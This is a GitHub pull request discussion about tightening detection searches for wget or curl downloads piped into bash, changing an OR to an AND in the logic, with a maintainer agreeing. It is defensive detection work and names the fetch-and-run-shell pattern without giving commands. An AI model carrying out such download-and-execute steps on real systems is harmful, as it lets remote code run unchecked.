security_content icon indicating copy to clipboard operation
security_content copied to clipboard

Wget/Curl Download and Bash Execution: Changing logic for search terms, to make searches comply with title and intention

Open DipsyTipsy opened this issue 10 months ago • 1 comments

Details

The logic in the queries here has an OR between the matching on quiet/stdout and the match for pipe and "bash". This causes the query to hit when wget/curl is either silenced or piped to bash. From the title i would maybe assume that an AND between the quiet/stdout check and pipe+bash check would be the correct queries?

Searches modified:

  • Wget Download and Bash Execution
  • Curl Download and Bash Execution

Checklist

  • [ ] Validate name matches <platform>_<mitre att&ck technique>_<short description> nomenclature
  • [ ] CI/CD jobs passed ✔️
  • [ ] Validated SPL logic.
  • [ ] Validated tags, description, and how to implement.
  • [ ] Verified references match analytic.

DipsyTipsy avatar Apr 10 '24 11:04 DipsyTipsy

Hey @DipsyTipsy , we are working to fix this up. I agree with your fixes. We're in the midst of ensuring we can generate new data that we can test against. We appreciate the feedback and apologize for the long delay in getting this resolved.

MHaggis avatar Aug 27 '24 16:08 MHaggis